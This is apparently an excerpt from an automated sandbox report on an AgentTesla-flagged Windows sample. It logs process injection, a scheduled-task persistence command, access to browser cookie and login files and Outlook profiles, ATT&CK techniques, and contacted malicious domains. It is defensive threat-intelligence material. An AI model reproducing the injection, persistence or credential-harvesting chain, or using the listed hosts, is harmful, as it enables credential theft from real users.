                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe protection: read write
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systray.exe | Thread register set: target process: 7860
                Source: C:\Windows\SysWOW64\systray.exe | Thread APC queued: target process: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C28008
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 115E008
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
                Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780676303.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000000.2541053355.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000000.2688907480.0000000001021000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780676303.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000000.2541053355.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000000.2688907480.0000000001021000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780676303.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000000.2541053355.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000000.2688907480.0000000001021000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780676303.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000000.2541053355.0000000000E21000.00000002.00000001.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000000.2688907480.0000000001021000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Queries volume information: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe VolumeInformation
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.3031.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe; Queries volume information: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe (VolumeInformation)
Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll (VolumeInformation)
Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll (VolumeInformation)
Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll (VolumeInformation)
Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll (VolumeInformation)
Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match; File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2624347397.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.4781302763.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\systray.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\systray.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\systray.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\systray.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\systray.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\systray.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\systray.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\systray.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\systray.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match; File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2624347397.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.4781302763.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques flagged for this sample, grouped by tactic; the number in parentheses is the badge the report shows next to each flagged technique. Tactics whose matrix cells carry no badge are listed as "none flagged".

Reconnaissance: none flagged
Resource Development: none flagged
Initial Access: none flagged
Execution: Scheduled Task/Job (1)
Persistence: Scheduled Task/Job (1); DLL Side-Loading (1)
Privilege Escalation: Process Injection (612); Scheduled Task/Job (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (41); Process Injection (612); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1)
Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (113)
Lateral Movement: none flagged
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4)
Exfiltration: none flagged
Impact: none flagged
Behavior Graph

[Behavior graph image not included; the node and edge text recovered from it is listed below.]

Behavior Graph ID: 1571280; Sample: MN1qo2qaJmEvXDP.exe; Startdate: 09/12/2024; Architecture: WINDOWS; Score: 100

Contacted domains: www.lingdianyun29.xyz; www.6822662.xyz; 13 other IPs or domains
Root signatures: Suricata IDS alerts for network traffic; Sigma detected: Scheduled temp file as task from temp location; Multi AV Scanner detection for submitted file; 6 other signatures; Performs DNS queries to domains with low reputation (www.6822662.xyz)

MN1qo2qaJmEvXDP.exe (started)
  Dropped: C:\Users\user\AppData\...\rlJvZXSinaRi.exe (PE32); C:\Users\...\rlJvZXSinaRi.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp1B5C.tmp (XML)
  Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
  Started: RegSvcs.exe; powershell.exe; powershell.exe; 2 other processes
    RegSvcs.exe: Maps a DLL or memory area into another process; injected into aDvThgRLSEMTIq.exe
    powershell.exe: Loading BitLocker PowerShell Module; started WmiPrvSE.exe and conhost.exe
    powershell.exe: started conhost.exe
    2 other processes: started conhost.exe

rlJvZXSinaRi.exe (started)
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  Started: schtasks.exe (started conhost.exe); RegSvcs.exe

aDvThgRLSEMTIq.exe (injected by RegSvcs.exe)
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  Started: systray.exe

systray.exe
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
  Injected into: aDvThgRLSEMTIq.exe
  Started: firefox.exe

aDvThgRLSEMTIq.exe (injected by systray.exe)
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  Network: hayaniya.org 192.185.147.100, 49738, 49739, 49740 (OIS1US, United States); www.learnnow.info 199.192.23.123, 49764, 49765, 49766 (NAMECHEAP-NETUS, United States); 8 other IPs or domains

Initial Sample (Source | Detection | Scanner | Label)
MN1qo2qaJmEvXDP.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
MN1qo2qaJmEvXDP.exe | 47% | Virustotal | (Browse)
MN1qo2qaJmEvXDP.exe | 100% | Joe Sandbox ML |

Dropped Files (Source | Detection | Scanner | Label)
C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/kuisi/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/uploads/images/7283870.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/mingrihuaqiluo/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/uploads/images/5680960.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://0dyos.comaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003A14000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/uploads/images/8363280.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/Dating/149c599845.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/jiuzhonghuannai/1/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/Dating/524e57698899.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/macangyou/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/changzezi/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/uploads/images/1890970.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/Dating/31b57699392.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/baishimolinair/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/yasendi/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/uploads/images/8182900.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.6822662.xyz/Dating/343e599651.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMN1qo2qaJmEvXDP.exe, 00000000.00000002.2418207809.0000000002641000.00000004.00000800.00020000.00000000.sdmp, MN1qo2qaJmEvXDP.exe, 00000000.00000002.2418207809.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, rlJvZXSinaRi.exe, 0000000B.00000002.2563827144.0000000003101000.00000004.00000800.00020000.00000000.sdmp, rlJvZXSinaRi.exe, 0000000B.00000002.2563827144.00000000031B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.6822662.xyz/xiqijiexika/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/jiuzhonghuannai/2/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/Dating/898f57698525.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/Dating/072d399924.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/Dating/233e199765.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/jiuzhonghuannai/7/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/Dating/239f57699184.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/zuozuomumingxib/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
